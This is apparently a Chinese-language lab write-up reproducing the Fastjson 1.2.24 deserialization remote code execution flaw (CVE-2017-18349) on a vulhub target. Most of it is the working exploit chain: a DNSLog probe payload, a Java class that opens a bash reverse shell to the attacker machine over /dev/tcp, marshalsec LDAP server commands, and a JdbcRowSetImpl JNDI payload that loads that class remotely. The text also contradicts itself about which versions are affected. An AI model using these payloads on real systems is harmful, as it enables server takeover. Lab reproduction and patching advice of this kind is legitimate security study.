Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)

0x01 漏洞简介:

​         fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串，这样得到字符串之后就可以通过数据库等方式进行持久化了。

​         阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞（CNVD-2022-40233）。攻击者可利用该漏洞实施任意文件写入、服务端请求伪造等攻击行为，造成服务器权限被窃取、敏感信息泄漏等严重影响。    

0x02 影响版本: 

fastjson<=1.2.24

该漏洞影响fastjson 1.2.80及之前所有版本

 图示：

 0x03 漏洞复现: 

环境准备

被攻击主机：CentOS7（192.168.217.140）

JDK版本：1.8 (shell弹不进去请检查版本)

靶场环境：vulhub/fastjson-1.2.24-rce

攻击主机：kali（192.168.217.141）

使用工具：marshalsec-0.0.3-SNAPSHOT-all.jar ，

GitHub - RandomRobbieBF/marshalsec-jar: marshalsec-0.0.3-SNAPSHOT-all compiled on X64

• docker拉取镜像

docker-compose up -d

• 启动环境并访问，出现下面页面表示访问成功

漏洞验证：

• 配合dnslog申请个子域名来探测是否存在漏洞
• 访问192.168.217.140:8090，使用brup拦截请求  
• 修改请求方法为post，修改 Content-Type为: application/json
• 添加请求正文，使用DNSLog进行验证：

{
	"a":{
	"@type":"java.net.Inet4Address",
	"val":"申请的域名"
	}
}

• 发送后，dns有返回，证明存在此漏洞

 漏洞利用：

• 编辑恶意类，创建一个.java 的文件，以反弹shell为例，而后使用javac命令进行编译而后放于kali中

import java.lang.Runtime;
import java.lang.Process;

public class GetShell {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.217.141/4444 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

 

• 在cmd里面使用命令，编译为.class文件

javac GetShell.java

• 将生成的文件，放在kali上，并开放http将GetShell.class变成可以访问

python -m SimpleHTTPServer

• 然后下载前面的POC，上传至kali。起一个LDAP服务器监听6666端口，远程加载GetShell类，并同时打开监听反弹shell的端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.217.141:8000/#GetShell 6666      

• 然后使用BP抓包，再次修改请求正文，使其下载恶意代码并执行

{
	"b":{
	"@type":"com.sun.rowset.JdbcRowSetImpl",
	"dataSourceName":"ldap://192.168.217.141:6666/GetShell",
	"autoCommit":true
	}
}

• 按照图示，点击发送

• 发送完成后，LDAP服务器接收到请求

• httpserver收到get请求

• 同时也接收到反弹shell，到此漏洞利用完成

 0x04 修复方案： 

• 建议升级到最新版本1.2.83
• safeMode加固。Fastjson在1.2.68及之后的版本中引入了safeMode，配置safeMode后，无论白名单和黑名单，都不支持 autoType，可杜绝反序列化Gadgets类变种攻击
• 升级至Fastjson v2